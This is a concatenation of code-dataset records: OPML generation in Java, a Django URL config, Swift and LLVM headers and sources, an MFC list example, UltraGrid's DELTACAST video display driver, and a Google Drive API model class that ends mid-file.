sb.append(value[0]); for (int i = 1; i < value.length; i++) { sb.append(","); sb.append(value[i]); } return sb.toString(); } }
token_count: 2,476
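OPML10Generator above is normally driven through ROME's WireFeedOutput rather than called directly. The following is a minimal sketch assuming ROME's public Opml/Outline setters and WireFeedOutput.outputString; the feed title and outline contents are made up for illustration.

import java.util.Collections;

import com.rometools.opml.feed.opml.Opml;
import com.rometools.opml.feed.opml.Outline;
import com.rometools.rome.io.WireFeedOutput;

public class OpmlOutputExample {
  public static void main(String[] args) throws Exception {
    Opml opml = new Opml();
    opml.setFeedType("opml_1.0");   // selects OPML10Generator
    opml.setTitle("Subscriptions");

    Outline outline = new Outline();
    outline.setText("Example feed");
    outline.setType("rss");
    opml.setOutlines(Collections.singletonList(outline));

    // WireFeedOutput looks up the generator registered for the feed type and
    // produces the <opml version="1.0"> document built by generate().
    String xml = new WireFeedOutput().outputString(opml);
    System.out.println(xml);
  }
}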
max_stars_count: 2,092
<gh_stars>1000+ """URL configuration for builds app.""" from django.conf.urls import url from django.views.generic.base import RedirectView urlpatterns = [ url( r'^(?P<project_slug>[-\w]+)/(?P<build_pk>\d+)/$', RedirectView.as_view(pattern_name='builds_detail', permanent=True), name='old_builds_detail', ), url( r'^(?P<project_slug>[-\w]+)/$', RedirectView.as_view(pattern_name='builds_project_list', permanent=True), name='old_builds_project_list', ), ]
token_count: 237
max_stars_count: 72,551
//===--- TypeResolutionStage.h - Type Resolution Stage ----------*- C++ -*-===// // // This source file is part of the Swift.org open source project // // Copyright (c) 2014 - 2018 Apple Inc. and the Swift project authors // Licensed under Apache License v2.0 with Runtime Library Exception // // See https://swift.org/LICENSE.txt for license information // See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors // //===----------------------------------------------------------------------===// #ifndef SWIFT_AST_TYPE_RESOLUTION_STAGE_H #define SWIFT_AST_TYPE_RESOLUTION_STAGE_H namespace llvm { class raw_ostream; } namespace swift { /// Describes the stage at which a particular type should be computed. /// /// Later stages compute more information about the type, requiring more /// complete analysis. enum class TypeResolutionStage : uint8_t { /// Produces an interface type describing its structure, but without /// performing semantic analysis to resolve (e.g.) references to members of /// type parameters. Structural, /// Produces a complete interface type where all member references have been /// resolved. Interface, }; /// Display a type resolution stage. void simple_display(llvm::raw_ostream &out, const TypeResolutionStage &value); } // end namespace swift #endif // SWIFT_AST_TYPE_RESOLUTION_STAGE_H
token_count: 365
max_stars_count: 6,989
#include "explicit_type.h"
token_count: 11
max_stars_count: 4,812
//===- PDBSymbolData.cpp - PDB data (e.g. variable) accessors ---*- C++ -*-===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "llvm/DebugInfo/PDB/PDBSymbolData.h" #include "llvm/DebugInfo/PDB/IPDBSectionContrib.h" #include "llvm/DebugInfo/PDB/IPDBSession.h" #include "llvm/DebugInfo/PDB/PDBSymDumper.h" #include <utility> using namespace llvm; using namespace llvm::pdb; void PDBSymbolData::dump(PDBSymDumper &Dumper) const { Dumper.dump(*this); } std::unique_ptr<IPDBEnumLineNumbers> PDBSymbolData::getLineNumbers() const { auto Len = RawSymbol->getLength(); Len = Len ? Len : 1; if (auto RVA = RawSymbol->getRelativeVirtualAddress()) return Session.findLineNumbersByRVA(RVA, Len); if (auto Section = RawSymbol->getAddressSection()) return Session.findLineNumbersBySectOffset( Section, RawSymbol->getAddressOffset(), Len); return nullptr; } uint32_t PDBSymbolData::getCompilandId() const { if (auto Lines = getLineNumbers()) { if (auto FirstLine = Lines->getNext()) return FirstLine->getCompilandId(); } uint32_t DataSection = RawSymbol->getAddressSection(); uint32_t DataOffset = RawSymbol->getAddressOffset(); if (DataSection == 0) { if (auto RVA = RawSymbol->getRelativeVirtualAddress()) Session.addressForRVA(RVA, DataSection, DataOffset); } if (DataSection) { if (auto SecContribs = Session.getSectionContribs()) { while (auto Section = SecContribs->getNext()) { if (Section->getAddressSection() == DataSection && Section->getAddressOffset() <= DataOffset && (Section->getAddressOffset() + Section->getLength()) > DataOffset) return Section->getCompilandId(); } } } else { auto LexParentId = RawSymbol->getLexicalParentId(); while (auto LexParent = Session.getSymbolById(LexParentId)) { if (LexParent->getSymTag() == PDB_SymType::Exe) break; if (LexParent->getSymTag() == PDB_SymType::Compiland) return LexParentId; LexParentId = LexParent->getRawSymbol().getLexicalParentId(); } } return 0; }
token_count: 852
max_stars_count: 965
// Define myList. CList<CString,CString&> myList; // Add two elements to the list. myList.AddHead(CString(_T("ABC"))); myList.AddHead(CString(_T("123"))); // Dump the list elements to the debug window, // in reverse order. POSITION pos = myList.GetTailPosition(); for (int i = 0; i < myList.GetCount(); i++) { TRACE(_T("%s\r\n"), (LPCTSTR)myList.GetPrev(pos)); }
token_count: 237
max_stars_count: 370
<reponame>thpryrchn/UltraGrid /** * @file video_display/deltacast.cpp * @author <NAME> <<EMAIL>> */ /* * Copyright (c) 2012-2019 CESNET, z. s. p. o. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, is permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * 3. Neither the name of CESNET nor the names of its contributors may be * used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, * BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO * EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifdef HAVE_CONFIG_H #include "config.h" #include "config_unix.h" #include "config_win32.h" #endif // HAVE_CONFIG_H #include "host.h" #include "debug.h" #include "deltacast_common.hpp" #include "lib_common.h" #include "tv.h" #include "video.h" #include "video_display.h" #include "debug.h" #include "audio/types.h" #include "audio/utils.h" #include "utils/ring_buffer.h" #include <algorithm> #define DELTACAST_MAGIC 0x01005e02 struct state_deltacast { uint32_t magic; struct timeval tv; struct video_frame *frame; struct tile *tile; unsigned long int frames; unsigned long int frames_last; bool initialized; HANDLE BoardHandle, StreamHandle; HANDLE SlotHandle; pthread_mutex_t lock; unsigned int play_audio:1; unsigned int audio_configured:1; VHD_AUDIOINFO AudioInfo; SHORT *pSample; struct audio_desc audio_desc; struct ring_buffer *audio_channels[16]; char *audio_tmp; }; static void show_help(void); static void show_help(void) { printf("deltacast (output) options:\n"); printf("\t-d deltacast[:device=<index>]\n"); print_available_delta_boards(); printf("\nDefault board is 0.\n"); } static struct video_frame * display_deltacast_getf(void *state) { struct state_deltacast *s = (struct state_deltacast *)state; BYTE *pBuffer; ULONG BufferSize; ULONG Result; assert(s->magic == DELTACAST_MAGIC); if(!s->initialized) return s->frame; Result = VHD_LockSlotHandle(s->StreamHandle, &s->SlotHandle); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unable to lock slot.\n"); return NULL; } Result = VHD_GetSlotBuffer(s->SlotHandle,VHD_SDI_BT_VIDEO,&pBuffer,&BufferSize); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unable to get buffer.\n"); return NULL; } s->tile->data = (char *) pBuffer; s->tile->data_len = BufferSize; return s->frame; } static int display_deltacast_putf(void *state, struct video_frame *frame, int nonblock) { struct state_deltacast *s = (struct state_deltacast 
*)state; struct timeval tv; int i; ULONG Result; UNUSED(frame); UNUSED(nonblock); assert(s->magic == DELTACAST_MAGIC); pthread_mutex_lock(&s->lock); if(s->play_audio && s->audio_configured) { /* Retrieve the number of needed samples */ for(i = 0; i < s->audio_desc.ch_count; ++i) { s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4].DataSize = 0; } Result = VHD_SlotEmbedAudio(s->SlotHandle,&s->AudioInfo); if (Result != VHDERR_BUFFERTOOSMALL) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot embed audio on TX0 stream. Result = 0x%08" PRIX32 "\n", Result); } else { for(i = 0; i < s->audio_desc.ch_count; ++i) { int ret; ret = ring_buffer_read(s->audio_channels[i], (char *) s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4].pData, s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4].DataSize); if(!ret) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Buffer underflow for channel %d.\n", i); } s->AudioInfo.pAudioGroups[0].pAudioChannels[0].DataSize = ret; } } /* Embed audio */ Result = VHD_SlotEmbedAudio(s->SlotHandle,&s->AudioInfo); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot embed audio on TX0 stream. Result = 0x%08" PRIX32 "\n",Result); } } pthread_mutex_unlock(&s->lock); VHD_UnlockSlotHandle(s->SlotHandle); s->SlotHandle = NULL; gettimeofday(&tv, NULL); double seconds = tv_diff(tv, s->tv); if (seconds > 5) { double fps = s->frames / seconds; log_msg(LOG_LEVEL_INFO, "[DELTACAST display] %lu frames in %g seconds = %g FPS\n", s->frames, seconds, fps); s->tv = tv; s->frames = 0; } s->frames++; return 0; } static int display_deltacast_reconfigure(void *state, struct video_desc desc) { struct state_deltacast *s = (struct state_deltacast *)state; int VideoStandard; int i; ULONG Result; if(s->initialized) { if(s->SlotHandle) VHD_UnlockSlotHandle(s->SlotHandle); VHD_StopStream(s->StreamHandle); VHD_CloseStreamHandle(s->StreamHandle); } assert(desc.tile_count == 1); s->tile->width = desc.width; s->tile->height = desc.height; s->frame->color_spec = desc.color_spec; s->frame->interlacing = desc.interlacing; s->frame->fps = desc.fps; for (i = 0; i < deltacast_frame_modes_count; ++i) { if(fabs(desc.fps - deltacast_frame_modes[i].fps) < 0.01 && desc.interlacing == deltacast_frame_modes[i].interlacing && desc.width == deltacast_frame_modes[i].width && desc.height == deltacast_frame_modes[i].height) { VideoStandard = deltacast_frame_modes[i].mode; log_msg(LOG_LEVEL_NOTICE, "[DELTACAST] %s mode selected.\n", deltacast_frame_modes[i].name); break; } } if(i == deltacast_frame_modes_count) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Failed to obtain video format for incoming video: %dx%d @ %2.2f %s\n", desc.width, desc.height, (double) desc.fps, get_interlacing_description(desc.interlacing)); goto error; } if(desc.color_spec == RAW) { Result = VHD_OpenStreamHandle(s->BoardHandle,VHD_ST_TX0,VHD_SDI_STPROC_RAW,NULL,&s->StreamHandle,NULL); } else if (s->play_audio == TRUE) { Result = VHD_OpenStreamHandle(s->BoardHandle,VHD_ST_TX0,VHD_SDI_STPROC_JOINED,NULL,&s->StreamHandle,NULL); } else { Result = VHD_OpenStreamHandle(s->BoardHandle,VHD_ST_TX0,VHD_SDI_STPROC_DISJOINED_VIDEO,NULL,&s->StreamHandle,NULL); } if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Failed to open stream handle.\n"); goto error; } VHD_SetStreamProperty(s->StreamHandle,VHD_SDI_SP_VIDEO_STANDARD,VideoStandard); VHD_SetStreamProperty(s->StreamHandle,VHD_CORE_SP_BUFFERQUEUE_DEPTH,2); VHD_SetStreamProperty(s->StreamHandle,VHD_CORE_SP_BUFFERQUEUE_PRELOAD,0); Result = 
VHD_StartStream(s->StreamHandle); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unable to start stream.\n"); goto error; } s->initialized = TRUE; return TRUE; error: return FALSE; } static void display_deltacast_probe(struct device_info **available_cards, int *count, void (**deleter)(void *)) { UNUSED(deleter); *count = 0; *available_cards = nullptr; ULONG Result,DllVersion,NbBoards; Result = VHD_GetApiInfo(&DllVersion,&NbBoards); if (Result != VHDERR_NOERROR) { return; } if (NbBoards == 0) { return; } /* Query DELTA boards information */ for (ULONG i = 0; i < NbBoards; i++) { ULONG BoardType; HANDLE BoardHandle = NULL; ULONG Result = VHD_OpenBoardHandle(i,&BoardHandle,NULL,0); VHD_GetBoardProperty(BoardHandle, VHD_CORE_BP_BOARD_TYPE, &BoardType); *count += 1; *available_cards = (struct device_info *) realloc(*available_cards, *count * sizeof(struct device_info)); memset(*available_cards + *count - 1, 0, sizeof(struct device_info)); sprintf((*available_cards)[*count - 1].dev, ":device=%d", *count - 1); sprintf((*available_cards)[*count - 1].dev, "\"embeddedAudioAvailable\":\"t\""); (*available_cards)[*count - 1].repeatable = false; if (Result == VHDERR_NOERROR) { std::string board{"Unknown DELTACAST type"}; auto it = board_type_map.find(BoardType); if (it != board_type_map.end()) { board = it->second; } snprintf((*available_cards)[*count - 1].name, sizeof (*available_cards)[*count - 1].name - 1, "DELTACAST %s", board.c_str()); VHD_CloseBoardHandle(BoardHandle); } } } static void *display_deltacast_init(struct module *parent, const char *fmt, unsigned int flags) { UNUSED(parent); struct state_deltacast *s; ULONG Result,DllVersion,NbBoards,ChnType; ULONG BrdId = 0; s = (struct state_deltacast *)calloc(1, sizeof(struct state_deltacast)); s->magic = DELTACAST_MAGIC; s->frame = vf_alloc(1); s->tile = vf_get_tile(s->frame, 0); s->frames = 0; gettimeofday(&s->tv, NULL); s->initialized = FALSE; if(flags & DISPLAY_FLAG_AUDIO_EMBEDDED) { s->play_audio = TRUE; } else { s->play_audio = FALSE; } s->BoardHandle = s->StreamHandle = s->SlotHandle = NULL; s->audio_configured = FALSE; if(fmt && strcmp(fmt, "help") == 0) { show_help(); vf_free(s->frame); free(s); return &display_init_noerr; } if(fmt) { char *tmp = strdup(fmt); char *save_ptr = NULL; char *tok; tok = strtok_r(tmp, ":", &save_ptr); if(!tok) { free(tmp); show_help(); goto error; } if (strncasecmp(tok, "device=", strlen("device=")) == 0) { BrdId = atoi(tok + strlen("device=")); } else { log_msg(LOG_LEVEL_ERROR, "Unknown option: %s\n\n", tok); free(tmp); show_help(); goto error; } free(tmp); } /* Query VideoMasterHD information */ Result = VHD_GetApiInfo(&DllVersion,&NbBoards); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot query VideoMasterHD" " information. Result = 0x%08" PRIX32 "\n", Result); goto error; } if (NbBoards == 0) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] No DELTA board detected, exiting...\n"); goto error; } if(BrdId >= NbBoards) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Wrong index %" PRIu32 ". Found %" PRIu32 " cards.\n", BrdId, NbBoards); goto error; } /* Open a handle on first DELTA-hd/sdi/codec board */ Result = VHD_OpenBoardHandle(BrdId,&s->BoardHandle,NULL,0); if (Result != VHDERR_NOERROR) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : Cannot open DELTA board %" PRIu32 " handle. 
Result = 0x%08" PRIX32 "\n", BrdId, Result); goto error; } if (!delta_set_nb_channels(BrdId, s->BoardHandle, 0, 1)) { goto error; } VHD_GetBoardProperty(s->BoardHandle, VHD_CORE_BP_TX0_TYPE, &ChnType); if((ChnType!=VHD_CHNTYPE_SDSDI)&&(ChnType!=VHD_CHNTYPE_HDSDI)&&(ChnType!=VHD_CHNTYPE_3GSDI)) { log_msg(LOG_LEVEL_ERROR, "[DELTACAST] ERROR : The selected channel is not an SDI one\n"); goto bad_channel; } /* Disable RX0-TX0 by-pass relay loopthrough */ VHD_SetBoardProperty(s->BoardHandle,VHD_CORE_BP_BYPASS_RELAY_0,FALSE); /* Select a 1/1 clock system */ VHD_SetBoardProperty(s->BoardHandle,VHD_SDI_BP_CLOCK_SYSTEM,VHD_CLOCKDIV_1); pthread_mutex_init(&s->lock, NULL); return s; bad_channel: VHD_CloseBoardHandle(s->BoardHandle); error: vf_free(s->frame); free(s); return NULL; } static void display_deltacast_run(void *state) { UNUSED(state); } static void display_deltacast_done(void *state) { struct state_deltacast *s = (struct state_deltacast *)state; if(s->initialized) { if(s->SlotHandle) VHD_UnlockSlotHandle(s->SlotHandle); VHD_StopStream(s->StreamHandle); VHD_CloseStreamHandle(s->StreamHandle); VHD_SetBoardProperty(s->BoardHandle,VHD_CORE_BP_BYPASS_RELAY_0,TRUE); VHD_CloseBoardHandle(s->BoardHandle); } vf_free(s->frame); free(s); } static int display_deltacast_get_property(void *state, int property, void *val, size_t *len) { UNUSED(state); codec_t codecs[] = {v210, UYVY, RAW}; interlacing_t supported_il_modes[] = {PROGRESSIVE, UPPER_FIELD_FIRST, SEGMENTED_FRAME}; int rgb_shift[] = {0, 8, 16}; switch (property) { case DISPLAY_PROPERTY_CODECS: if(sizeof(codecs) <= *len) { memcpy(val, codecs, sizeof(codecs)); } else { return FALSE; } *len = sizeof(codecs); break; case DISPLAY_PROPERTY_RGB_SHIFT: if(sizeof(rgb_shift) > *len) { return FALSE; } memcpy(val, rgb_shift, sizeof(rgb_shift)); *len = sizeof(rgb_shift); break; case DISPLAY_PROPERTY_BUF_PITCH: *(int *) val = PITCH_DEFAULT; *len = sizeof(int); break; case DISPLAY_PROPERTY_SUPPORTED_IL_MODES: if(sizeof(supported_il_modes) <= *len) { memcpy(val, supported_il_modes, sizeof(supported_il_modes)); } else { return FALSE; } *len = sizeof(supported_il_modes); break; case DISPLAY_PROPERTY_AUDIO_FORMAT: { assert(*len == sizeof(struct audio_desc)); struct audio_desc *desc = (struct audio_desc *) val; desc->sample_rate = 48000; desc->ch_count = std::max(desc->ch_count, 16); desc->codec = AC_PCM; desc->bps = desc->bps < 3 ? 
2 : 3; } break; default: return FALSE; } return TRUE; } static int display_deltacast_reconfigure_audio(void *state, int quant_samples, int channels, int sample_rate) { struct state_deltacast *s = (struct state_deltacast *)state; int i; assert(channels <= 16); pthread_mutex_lock(&s->lock); s->audio_configured = FALSE; for(i = 0; i < 16; ++i) { ring_buffer_destroy(s->audio_channels[i]); s->audio_channels[i] = NULL; } free(s->audio_tmp); s->audio_desc.bps = quant_samples / 8; s->audio_desc.ch_count = channels; s->audio_desc.sample_rate = sample_rate; for(i = 0; i < channels; ++i) { s->audio_channels[i] = ring_buffer_init(s->audio_desc.bps * s->audio_desc.sample_rate); } s->audio_tmp = (char *) malloc(s->audio_desc.bps * s->audio_desc.sample_rate); /* Configure audio info */ memset(&s->AudioInfo, 0, sizeof(VHD_AUDIOINFO)); for(i = 0; i < channels; ++i) { VHD_AUDIOCHANNEL *pAudioChn=NULL; pAudioChn = &s->AudioInfo.pAudioGroups[i / 4].pAudioChannels[i % 4]; pAudioChn->Mode = VHD_AM_MONO; switch(quant_samples) { case 16: pAudioChn->BufferFormat = VHD_AF_16; break; case 20: pAudioChn->BufferFormat = VHD_AF_20; break; case 24: pAudioChn->BufferFormat = VHD_AF_24; break; default: log_msg(LOG_LEVEL_ERROR, "[DELTACAST] Unsupported PCM audio: %d bits.\n", quant_samples); pthread_mutex_unlock(&s->lock); return FALSE; } pAudioChn->pData = new BYTE[s->audio_desc.bps * s->audio_desc.sample_rate]; } s->audio_configured = TRUE; pthread_mutex_unlock(&s->lock); return TRUE; } static void display_deltacast_put_audio_frame(void *state, struct audio_frame *frame) { struct state_deltacast *s = (struct state_deltacast *)state; int i; int channel_len = frame->data_len / frame->ch_count; pthread_mutex_lock(&s->lock); for(i = 0; i < frame->ch_count; ++i) { demux_channel(s->audio_tmp, frame->data, frame->bps, frame->data_len, frame->ch_count, i); ring_buffer_write(s->audio_channels[i], s->audio_tmp, channel_len); } pthread_mutex_unlock(&s->lock); } static const struct video_display_info display_deltacast_info = { display_deltacast_probe, display_deltacast_init, display_deltacast_run, display_deltacast_done, display_deltacast_getf, display_deltacast_putf, display_deltacast_reconfigure, display_deltacast_get_property, display_deltacast_put_audio_frame, display_deltacast_reconfigure_audio, DISPLAY_DOESNT_NEED_MAINLOOP, }; REGISTER_MODULE(deltacast, &display_deltacast_info, LIBRARY_CLASS_VIDEO_DISPLAY, VIDEO_DISPLAY_ABI_VERSION);
token_count: 11,700
max_stars_count: 372
<reponame>arithmetic1728/google-api-java-client-services /* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.drive.model; /** * The apps resource provides a list of the apps that a user has installed, with information about * each app's supported MIME types, file extensions, and other details. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Drive API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class App extends com.google.api.client.json.GenericJson { /** * Whether the app is authorized to access data on the user's Drive. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean authorized; /** * The template url to create a new file with this app in a given folder. The template will * contain {folderId} to be replaced by the folder to create the new file in. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String createInFolderTemplate; /** * The url to create a new file with this app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String createUrl; /** * Whether the app has drive-wide scope. An app with drive-wide scope can access all files in the * user's drive. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean hasDriveWideScope; /** * The various icons for the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<Icons> icons; static { // hack to force ProGuard to consider Icons used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(Icons.class); } /** * The ID of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String id; /** * Whether the app is installed. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean installed; /** * This is always drive#app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String kind; /** * A long description of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String longDescription; /** * The name of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * The type of object this app creates (e.g. Chart). If empty, the app name should be used * instead. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private java.lang.String objectType; /** * The template url for opening files with this app. The template will contain {ids} and/or * {exportIds} to be replaced by the actual file ids. See Open Files for the full documentation. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String openUrlTemplate; /** * The list of primary file extensions. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> primaryFileExtensions; /** * The list of primary mime types. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> primaryMimeTypes; /** * The ID of the product listing for this app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String productId; /** * A link to the product listing for this app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String productUrl; /** * The list of secondary file extensions. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> secondaryFileExtensions; /** * The list of secondary mime types. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> secondaryMimeTypes; /** * A short description of the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String shortDescription; /** * Whether this app supports creating new objects. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsCreate; /** * Whether this app supports importing from Docs Editors. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsImport; /** * Whether this app supports opening more than one file. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsMultiOpen; /** * Whether this app supports creating new files when offline. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean supportsOfflineCreate; /** * Whether the app is selected as the default handler for the types it supports. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean useByDefault; /** * Whether the app is authorized to access data on the user's Drive. * @return value or {@code null} for none */ public java.lang.Boolean getAuthorized() { return authorized; } /** * Whether the app is authorized to access data on the user's Drive. * @param authorized authorized or {@code null} for none */ public App setAuthorized(java.lang.Boolean authorized) { this.authorized = authorized; return this; } /** * The template url to create a new file with this app in a given folder. The template will * contain {folderId} to be replaced by the folder to create the new file in. * @return value or {@code null} for none */ public java.lang.String getCreateInFolderTemplate() { return createInFolderTemplate; } /** * The template url to create a new file with this app in a given folder. The template will * contain {folderId} to be replaced by the folder to create the new file in. 
* @param createInFolderTemplate createInFolderTemplate or {@code null} for none */ public App setCreateInFolderTemplate(java.lang.String createInFolderTemplate) { this.createInFolderTemplate = createInFolderTemplate; return this; } /** * The url to create a new file with this app. * @return value or {@code null} for none */ public java.lang.String getCreateUrl() { return createUrl; } /** * The url to create a new file with this app. * @param createUrl createUrl or {@code null} for none */ public App setCreateUrl(java.lang.String createUrl) { this.createUrl = createUrl; return this; } /** * Whether the app has drive-wide scope. An app with drive-wide scope can access all files in the * user's drive. * @return value or {@code null} for none */ public java.lang.Boolean getHasDriveWideScope() { return hasDriveWideScope; } /** * Whether the app has drive-wide scope. An app with drive-wide scope can access all files in the * user's drive. * @param hasDriveWideScope hasDriveWideScope or {@code null} for none */ public App setHasDriveWideScope(java.lang.Boolean hasDriveWideScope) { this.hasDriveWideScope = hasDriveWideScope; return this; } /** * The various icons for the app. * @return value or {@code null} for none */ public java.util.List<Icons> getIcons() { return icons; } /** * The various icons for the app. * @param icons icons or {@code null} for none */ public App setIcons(java.util.List<Icons> icons) { this.icons = icons; return this; } /** * The ID of the app. * @return value or {@code null} for none */ public java.lang.String getId() { return id; } /** * The ID of the app. * @param id id or {@code null} for none */ public App setId(java.lang.String id) { this.id = id; return this; } /** * Whether the app is installed. * @return value or {@code null} for none */ public java.lang.Boolean getInstalled() { return installed; } /** * Whether the app is installed. * @param installed installed or {@code null} for none */ public App setInstalled(java.lang.Boolean installed) { this.installed = installed; return this; } /** * This is always drive#app. * @return value or {@code null} for none */ public java.lang.String getKind() { return kind; } /** * This is always drive#app. * @param kind kind or {@code null} for none */ public App setKind(java.lang.String kind) { this.kind = kind; return this; } /** * A long description of the app. * @return value or {@code null} for none */ public java.lang.String getLongDescription() { return longDescription; } /** * A long description of the app. * @param longDescription longDescription or {@code null} for none */ public App setLongDescription(java.lang.String longDescription) { this.longDescription = longDescription; return this; } /** * The name of the app. * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * The name of the app. * @param name name or {@code null} for none */ public App setName(java.lang.String name) { this.name = name; return this; } /** * The type of object this app creates (e.g. Chart). If empty, the app name should be used * instead. * @return value or {@code null} for none */ public java.lang.String getObjectType() { return objectType; } /** * The type of object this app creates (e.g. Chart). If empty, the app name should be used * instead. * @param objectType objectType or {@code null} for none */ public App setObjectType(java.lang.String objectType) { this.objectType = objectType; return this; } /** * The template url for opening files with this app. 
The template will contain {ids} and/or * {exportIds} to be replaced by the actual file ids. See Open Files for the full documentation. * @return value or {@code null} for none */ public java.lang.String getOpenUrlTemplate() { return openUrlTemplate; } /** * The template url for opening files with this app. The template will contain {ids} and/or * {exportIds} to be replaced by the actual file ids. See Open Files for the full documentation. * @param openUrlTemplate openUrlTemplate or {@code null} for none */ public App setOpenUrlTemplate(java.lang.String openUrlTemplate) { this.openUrlTemplate = openUrlTemplate; return this; } /** * The list of primary file extensions. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getPrimaryFileExtensions() { return primaryFileExtensions; } /** * The list of primary file extensions. * @param primaryFileExtensions primaryFileExtensions or {@code null} for none */ public App setPrimaryFileExtensions(java.util.List<java.lang.String> primaryFileExtensions) { this.primaryFileExtensions = primaryFileExtensions; return this; } /** * The list of primary mime types. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getPrimaryMimeTypes() { return primaryMimeTypes; } /** * The list of primary mime types. * @param primaryMimeTypes primaryMimeTypes or {@code null} for none */ public App setPrimaryMimeTypes(java.util.List<java.lang.String> primaryMimeTypes) { this.primaryMimeTypes = primaryMimeTypes; return this; } /** * The ID of the product listing for this app. * @return value or {@code null} for none */ public java.lang.String getProductId() { return productId; } /** * The ID of the product listing for this app. * @param productId productId or {@code null} for none */ public App setProductId(java.lang.String productId) { this.productId = productId; return this; } /** * A link to the product listing for this app. * @return value or {@code null} for none */ public java.lang.String getProductUrl() { return productUrl; } /** * A link to the product listing for this app. * @param productUrl productUrl or {@code null} for none */ public App setProductUrl(java.lang.String productUrl) { this.productUrl = productUrl; return this; } /** * The list of secondary file extensions. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getSecondaryFileExtensions() { return secondaryFileExtensions; } /** * The list of secondary file extensions. * @param secondaryFileExtensions secondaryFileExtensions or {@code null} for none */ public App setSecondaryFileExtensions(java.util.List<java.lang.String> secondaryFileExtensions) { this.secondaryFileExtensions = secondaryFileExtensions; return this; } /** * The list of 